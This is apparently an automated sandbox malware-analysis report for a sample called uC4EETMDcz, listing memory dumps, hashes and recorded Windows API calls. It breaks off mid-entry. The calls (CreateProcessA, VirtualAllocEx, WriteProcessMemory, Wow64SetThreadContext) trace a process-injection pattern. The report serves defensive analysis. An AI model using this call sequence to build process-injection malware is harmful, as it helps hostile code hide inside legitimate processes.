                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a8f2105cd9e273d316e458c074d79fdbbacdb2dcd8fb1aac43c1d73af1ee7d5f
                                              • Instruction ID: 3c731777090e5716a10d8048f41fa5316b36dbd0e0311d466955bd448b8b46d8
                                              • Opcode Fuzzy Hash: a8f2105cd9e273d316e458c074d79fdbbacdb2dcd8fb1aac43c1d73af1ee7d5f
                                              • Instruction Fuzzy Hash: 5971F874E01209DFDB08DFA9D950AAEBBF2FF89300F148029E509AB355DB34A946DB54
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: jjjjjj
                                              • API String ID: 0-3900813449

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: jjjjjj
                                              • API String ID: 0-3900813449

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: jjjjjj
                                              • API String ID: 0-3900813449

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056F81DF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 056F81DF
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0

                                              APIs
                                              • CopyFileA.KERNEL32(?,?,?), ref: 056EC70B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0

                                              APIs
                                              • CopyFileA.KERNEL32(?,?,?), ref: 056EC70B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056F96CB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056F96CB
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056F93A2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056F93A2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 056F88E7
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0557D9D4
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2397433503.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5570000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: d
                                              • API String ID: 0-2564639436
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 056F88E7
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399439396.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56f0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399309198.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_56e0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              APIs
                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0557EB07
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2397433503.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5570000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N$EL
                                              • API String ID: 0-2544871637
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N$EL
                                              • API String ID: 0-2544871637
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: <
                                              • API String ID: 0-4251816714
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: f
                                              • API String ID: 0-1993550816
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: f
                                              • API String ID: 0-1993550816
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 5
                                              • API String ID: 0-2226203566
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: P
                                              • API String ID: 0-3110715001
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: jjjjjj
                                              • API String ID: 0-3900813449
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 69d348a18489200bfcf7b5559c5a445f3abb1bc05351665ecb60d8ddc17c4248
                                              • Instruction ID: dbea700d316a3dfffdf2578a2850f5014860136878e8b1a8cac1de3cd94fa353
                                              • Opcode Fuzzy Hash: 69d348a18489200bfcf7b5559c5a445f3abb1bc05351665ecb60d8ddc17c4248
                                              • Instruction Fuzzy Hash: CDA11D39B002148FDB15DF64C898B9DBBB2BF89300F5185A8E54AAB355DFB0AD85CF40
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4dccbd2a645f14b648e95753cbf15be32d1e30e00de1295c3603ddaded491004
                                              • Instruction ID: 1d85d04052b0032ea88e2803693a4d93ea6515924a618f53091b92ab222d19ce
                                              • Opcode Fuzzy Hash: 4dccbd2a645f14b648e95753cbf15be32d1e30e00de1295c3603ddaded491004
                                              • Instruction Fuzzy Hash: 66A1CA39A10218DFCB05EFA4D998A9DBBB2FF89300F158155E405AB365DB74AC46CB40
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2d08ec0ee8f09ffb4fce7d58809e97ae9e08fa3c881a47c6aa3714b714e698d9
                                              • Instruction ID: 6a09f065f8cf5e89a012d3dec2d1b2fbbac750dda03144e0fd4f6f40edfd7a66
                                              • Opcode Fuzzy Hash: 2d08ec0ee8f09ffb4fce7d58809e97ae9e08fa3c881a47c6aa3714b714e698d9
                                              • Instruction Fuzzy Hash: CE815C39B10214DFCB15DF69D498A6DBBB6FF88710F154069E9069B3A2CB34EC41CB90
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4631e7a76f3149d2b5aaf7e6268b7c48c077ea55a8b8ed8e23ae87ff2fd50591
                                              • Instruction ID: 0d3e8190959bc9696753771ef961aba8e248d6cc12a32cd88486baf86c9ded17
                                              • Opcode Fuzzy Hash: 4631e7a76f3149d2b5aaf7e6268b7c48c077ea55a8b8ed8e23ae87ff2fd50591
                                              • Instruction Fuzzy Hash: 8F611F31704202CFDB95EF68D8407EA77B1EBC6314F9086AAD406DB291DF34E84AEB10
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac84d3e84c116458dbddb974a2b88e1345d525a54506c1753febd1ffa2766a90
                                              • Instruction ID: 991a61150f4491476eaa618450f6e739646fc27d7271ced4dedaadbe7739a5ba
                                              • Opcode Fuzzy Hash: ac84d3e84c116458dbddb974a2b88e1345d525a54506c1753febd1ffa2766a90
                                              • Instruction Fuzzy Hash: 59611971B04204CFD718A779CC517AA7BA2BBC6B10F21456AD506DB3E1DB70DE06A391
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b2a3ce25fbb5c9e9f1c3723098b8049d51b69397337563edada90c064a877af9
                                              • Instruction ID: 25356c42d0a6afa63492c62c56ddec04f29e1929689a0fc1e495fdfcad90e12b
                                              • Opcode Fuzzy Hash: b2a3ce25fbb5c9e9f1c3723098b8049d51b69397337563edada90c064a877af9
                                              • Instruction Fuzzy Hash: B8711F35B00214DFDB19DBA4D858BAE7BF2BF88710F104069E5059B396DFB5AC428B91
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5691014849179a452f9ee3ccd43a5d6b95dbe25e43d4d10435003969a551b9ca
                                              • Instruction ID: ec8ad6cb18c0325ac2bb06fb6fe9cfdf59acfeee239489ea6ccdc6fef4b94384
                                              • Opcode Fuzzy Hash: 5691014849179a452f9ee3ccd43a5d6b95dbe25e43d4d10435003969a551b9ca
                                              • Instruction Fuzzy Hash: 37519C707002148FE729AF68D854A6E77A6EFC9654B10446DDD06DB390DF39EC06CB94
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b478347a333ffd98cafc735ecaa96c4458048787e068fb8909c7be300dadbaf5
                                              • Instruction ID: b2315c6ef08d6a18e1773785936030291b5e325e0bcf893843b6d29930c24089
                                              • Opcode Fuzzy Hash: b478347a333ffd98cafc735ecaa96c4458048787e068fb8909c7be300dadbaf5
                                              • Instruction Fuzzy Hash: D4711674E04218DFDB04EFE9E8886DEBBB2FB89310F108169D416AB355DB785906EF40
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 22fbb8d32ccd13f73ae69d1a35836540f08656673490035cc8bd40895b4787c1
                                              • Instruction ID: f7197ac4552957a2a22c5846ae35a13469075acf24e911f3b7a1103a98fc7d49
                                              • Opcode Fuzzy Hash: 22fbb8d32ccd13f73ae69d1a35836540f08656673490035cc8bd40895b4787c1
                                              • Instruction Fuzzy Hash: B4614479E05208CFDB15DFA9E4847EDBBF2EB89314F248029D00AA7745DBB49986CF00
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 304ae216b0007c88d8c6b9c73148fddc3fd250cd0395529aba236f168b35f079
                                              • Instruction ID: 0bb8693619bd9881af91c8b2fba25abbde945eb32fe5980181bf917f5ed7b7df
                                              • Opcode Fuzzy Hash: 304ae216b0007c88d8c6b9c73148fddc3fd250cd0395529aba236f168b35f079
                                              • Instruction Fuzzy Hash: E6614479D05608CFCB19DFA9E4847EDBBF2EB89314F259029D00AA7745DBB49986CF00
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2378372832.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_f80000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fa748baa6ad449b6d7d20a3278a811a7325eef9b0e647c3ffcaa6e8d62408694
                                              • Instruction ID: a96ebad74b2b9aeae7ae769e67d926b0f17cadb456314071e201985667468bec
                                              • Opcode Fuzzy Hash: fa748baa6ad449b6d7d20a3278a811a7325eef9b0e647c3ffcaa6e8d62408694
                                              • Instruction Fuzzy Hash: 8D711774E00218DFDB04EFE9E8886DEBBB2FB89310F108129E516A7354DB785906EF50
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 747583131ebefc94bc404f7e2d8fbbb8acd9cbb3414c83238e079f10551420ae
                                              • Instruction ID: 0b5a1936acf5d26bfaf6e823873f2d5ec202f8c2f971084eaf9db2b38c742226
                                              • Opcode Fuzzy Hash: 747583131ebefc94bc404f7e2d8fbbb8acd9cbb3414c83238e079f10551420ae
                                              • Instruction Fuzzy Hash: A1613C39B102149FCB05DF64C898EADB7B6FF88710F158169E906AB362DB34EC41CB90
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399639540.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5810000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: af33293cda5c05506bba3e8b9778eeb9f8bbc744e4cfe0a3ab50f3bb072fd770
                                              • Instruction ID: 5bc36e0cb7ea27ea135d07c5beb34b3b222cc769419b3e5dfaadeceab803ce11
                                              • Opcode Fuzzy Hash: af33293cda5c05506bba3e8b9778eeb9f8bbc744e4cfe0a3ab50f3bb072fd770
                                              • Instruction Fuzzy Hash: 4461D374E05228DFDB04EFA9D8846EEBBB2FF89304F10812AD819A7244D7741D86CF91
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d21a9a5e82d1297d8d88ccefe734367562d830d33c979187a9d1fe3d994616a3
                                              • Instruction ID: 3221890c0a40a7b4cd195498e53beb56f2319fe0788bdf2821daa40d11b81efd
                                              • Opcode Fuzzy Hash: d21a9a5e82d1297d8d88ccefe734367562d830d33c979187a9d1fe3d994616a3
                                              • Instruction Fuzzy Hash: 9C51BE317002459FEB199E29D854BAE3BE2EFC8744F14812AE805CB391CF39ED12CB90
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7fbe82da619f44b7a543963805285a1f2761cb3d943f550239c08c42a5595be2
                                              • Instruction ID: 7c5d69c5b417f08c09604876ec696ef24d984dde5b29e2f75be1b0b958931ac2
                                              • Opcode Fuzzy Hash: 7fbe82da619f44b7a543963805285a1f2761cb3d943f550239c08c42a5595be2
                                              • Instruction Fuzzy Hash: 97510C76600104EFCB469F98D904D697BB3FF8C3147198094E6099B372DA36DC22EB91
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6a943894349f5de74924ce8232697c2d531efd2374dfcbcda6a754663d7b2cef
                                              • Instruction ID: d9af1fa3efcb7fb59641c6c4d53c9515f247b1c32ce96dcb7bee89d1d40f50e8
                                              • Opcode Fuzzy Hash: 6a943894349f5de74924ce8232697c2d531efd2374dfcbcda6a754663d7b2cef
                                              • Instruction Fuzzy Hash: 0541A236704210AFDB069F69D814E5A7FB6EF89320B1580A6F505DF372CB36D811DBA1
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14561155f150a373525e1757042d61c69017227ed2c5112d179c44690f3581fb
                                              • Instruction ID: 77348dd0e5eae20b2bb5f6b2d69fc74d67ce08161bfd8f5986d0ed0e4e3e14b6
                                              • Opcode Fuzzy Hash: 14561155f150a373525e1757042d61c69017227ed2c5112d179c44690f3581fb
                                              • Instruction Fuzzy Hash: 67516E35B10609DFCB05EF64E4A8AAE7BB6FF89711F008119F5029B364DF74A906CB81
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2395215825.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4f90000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 53629162c0903579ebb121d7a995a8709f06be9928ecd8ec3563935043f33aeb
                                              • Instruction ID: 12cad7d1631bddb35c2b68b4d87dc0ce04ecf3796b554e4d1b70892aa1422539
                                              • Opcode Fuzzy Hash: 53629162c0903579ebb121d7a995a8709f06be9928ecd8ec3563935043f33aeb
                                              • Instruction Fuzzy Hash: 9951F4B1D05208CFDB18CFA9D8946DDBBF2EF99304F20902AD415AB366DB71A946CF40
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bae00376d51adae1e51f6f915b5328002cefd34fd6bed593b88793a107dbdbe1
                                              • Instruction ID: 964ad8a54df217e74ddc93246cac3ce890e2bb2a012468b236d2d27cc6691efc
                                              • Opcode Fuzzy Hash: bae00376d51adae1e51f6f915b5328002cefd34fd6bed593b88793a107dbdbe1
                                              • Instruction Fuzzy Hash: E34116712007118FE324DF6AD44075A7BE2EFC4310F108A2DD95A8F791DF78E9098798
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e80f8bed84318ea69b08e936da6f73d1d3d088d2f5b79ff4f3251ebeb2e7f75
                                              • Instruction ID: 3f7ad77723e0adda3cb3ffbd696e657b8e101fc6d1c17e3fbebe27f3a1b54bfc
                                              • Opcode Fuzzy Hash: 9e80f8bed84318ea69b08e936da6f73d1d3d088d2f5b79ff4f3251ebeb2e7f75
                                              • Instruction Fuzzy Hash: CC419539B106148FCB05EB68C868AAE77B7AFCC700F10441DD5069B355DFB49C46DB91
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2399489943.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_5710000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 02f01858702a116059760d4647c7b67393a2512c2950913425ff7892e92bb48f
                                              • Instruction ID: b48d405e87659c2aef26ee6e04566877815dc85b5dce966aaf6f8ac01c3a318c
                                              • Opcode Fuzzy Hash: 02f01858702a116059760d4647c7b67393a2512c2950913425ff7892e92bb48f
                                              • Instruction Fuzzy Hash: 835139B0A04218CFDB28DF5AD845BAAB7F6FB89300F1090E5D80DA3211DB749E85DF59
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.2396175651.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_51a0000_uC4EETMDcz.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
